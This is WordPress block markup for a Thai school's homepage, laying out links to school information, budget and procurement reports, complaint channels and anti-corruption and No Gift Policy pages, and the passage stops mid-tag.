{\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 